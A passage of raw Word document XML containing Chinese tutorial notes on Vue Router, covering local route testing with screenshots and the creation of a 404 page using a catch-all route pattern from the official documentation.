      </w:pPr>
      <w:r>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F625DF2" w14:textId="77777777" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CE1C09B" w14:textId="3BBAD43F" w:rsidR="007F2C96" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>export default router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA6E1A2" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F180E9B" w14:textId="377C0A6C" w:rsidR="005F2D5C" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2AF033" w14:textId="02915DAE" w:rsidR="007F2C96" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他的不用刷新，直接访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064DA108" w14:textId="4B5FDE11" w:rsidR="007F2C96" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F2D5C">
        <w:t>http://127.0.0.1:5173/about</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2774D7" w14:textId="57C8320B" w:rsidR="007F2C96" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3634B78C" wp14:editId="0090C09D">
            <wp:extent cx="2553549" cy="1512884"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="562360478" name="图片 1"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60478" name="图片 1" descr="图形用户界面, 文本, 应用程序, 聊天或短信&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId184"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2564977" cy="1519654"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BA3A23" w14:textId="09EEB5C1" w:rsidR="007F2C96" w:rsidRDefault="005F2D5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005F2D5C">
        <w:t>http://127.0.0.1:5173/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A554F6A" w14:textId="65605038" w:rsidR="007F2C96" w:rsidRDefault="00EE12D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AF26AA8" wp14:editId="05B15581">
            <wp:extent cx="3106509" cy="1382707"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="1699491809" name="图片 1"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91809" name="图片 1" descr="图形用户界面, 网站&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId185"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3112893" cy="1385549"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D49BA1" w14:textId="3B81802A" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1184"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E01B30" w14:textId="196F25FB" w:rsidR="00EE12D4" w:rsidRDefault="00EE12D4" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1184"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>瞎写一个路由，什么也不是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38634EB9" w14:textId="26649F69" w:rsidR="007F2C96" w:rsidRDefault="00EE12D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE12D4">
        <w:t>http://127.0.0.1:5173/123123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CFE3E0" w14:textId="5713B2EB" w:rsidR="007F2C96" w:rsidRDefault="00EE12D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29C3B6CB" wp14:editId="788E8BDF">
            <wp:extent cx="2321554" cy="1605467"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="813192487" name="图片 1"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92487" name="图片 1" descr="图形用户界面, 文本, 应用程序, 聊天或短信&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId186"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2327982" cy="1609912"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4665EBF4" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F19D8D7" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DA08AD8" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FB590A" w14:textId="109A3529" w:rsidR="007F2C96" w:rsidRDefault="00F363C4" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>##</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F937C91" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C6A40D" w14:textId="77777777" w:rsidR="00330C67" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B7B0D2" w14:textId="4F2ED951" w:rsidR="00330C67" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>src/pages/404.vue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B456123" w14:textId="77777777" w:rsidR="00330C67" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AA76CFC" w14:textId="77777777" w:rsidR="00330C67" w:rsidRPr="00330C67" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00330C67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CBB57" w14:textId="77777777" w:rsidR="00330C67" w:rsidRPr="00330C67" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00330C67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177BD080" w14:textId="77777777" w:rsidR="00330C67" w:rsidRPr="00330C67" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00330C67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        404</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FA7474" w14:textId="77777777" w:rsidR="00330C67" w:rsidRPr="00330C67" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00330C67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621E7176" w14:textId="3A52313A" w:rsidR="00330C67" w:rsidRPr="00330C67" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00330C67">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>&lt;/template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA6F587" w14:textId="6E976023" w:rsidR="00330C67" w:rsidRPr="00330C67" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>router</w:t>
      </w:r>
      <w:r>
        <w:t>/index.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379B1749" w14:textId="028F1527" w:rsidR="00330C67" w:rsidRDefault="00E02807" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官方提示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2176A2E1" w14:textId="49E8C9B6" w:rsidR="00330C67" w:rsidRPr="00330C67" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId187" w:anchor="%E6%8D%95%E8%8E%B7%E6%89%80%E6%9C%89%E8%B7%AF%E7%94%B1%E6%88%96-404-Not-found-%E8%B7%AF%E7%94%B1" w:history="1">
        <w:r w:rsidRPr="008F6C9E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://router.vuejs.org/zh/guide/essentials/dynamic-matching.html#%E6%8D%95%E8%8E%B7%E6%89%80%E6%9C%89%E8%B7%AF%E7%94%B1%E6%88%96-404-Not-found-%E8%B7%AF%E7%94%B1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1AB54815" w14:textId="0B9C2B38" w:rsidR="00330C67" w:rsidRPr="00330C67" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看到如下内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773B90A2" w14:textId="77777777" w:rsidR="00E02807" w:rsidRPr="00E02807" w:rsidRDefault="00E02807" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t>const routes = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43288479" w14:textId="77777777" w:rsidR="00E02807" w:rsidRPr="00E02807" w:rsidRDefault="00E02807" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t>将匹配所有内容并将其放在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t xml:space="preserve"> `$route.params.pathMatch` </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046EE5E9" w14:textId="77777777" w:rsidR="00E02807" w:rsidRPr="00E02807" w:rsidRDefault="00E02807" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t xml:space="preserve">  { path: '/:pathMatch(.*)*', name: 'NotFound', component: NotFound },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D76C7DB" w14:textId="77777777" w:rsidR="00E02807" w:rsidRPr="00E02807" w:rsidRDefault="00E02807" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t>将匹配以</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t xml:space="preserve"> `/user-` </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t>开头的所有内容，并将其放在</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t xml:space="preserve"> `$route.params.afterUser` </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DDD67A" w14:textId="77777777" w:rsidR="00E02807" w:rsidRPr="00E02807" w:rsidRDefault="00E02807" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t xml:space="preserve">  { path: '/user-:afterUser(.*)', component: UserGeneric },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D05DD17" w14:textId="1979EFD2" w:rsidR="007F2C96" w:rsidRDefault="00E02807" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E02807">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="161618"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FF890F" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756598D7" w14:textId="435314E8" w:rsidR="007F2C96" w:rsidRDefault="00330C67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接把这个粘贴到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A574BA" w14:textId="77777777" w:rsidR="007F2C96" w:rsidRDefault="007F2C96" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9B17EF" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF1E838" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    createRouter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D666F41" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    createWebHistory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC6F251" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>} from 'vue-router'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B083D" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D87B48C" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import Index from '~/pages/index.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A263506" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import About from '~/pages/about.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD2309" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import NotFound from '~/pages/404.vue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C5F3C7" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4325D529" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>const routes = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6F64C2" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5579184E" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        path: '/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A63A29" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        component: Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0111F7DD" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295E78E8" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285128C9" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        path: '/about',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C967774" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        component: About</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437189D3" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C13C5D" w14:textId="77777777" w:rsidR="00CC2B48" w:rsidRPr="00CC2B48" w:rsidRDefault="00CC2B48" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
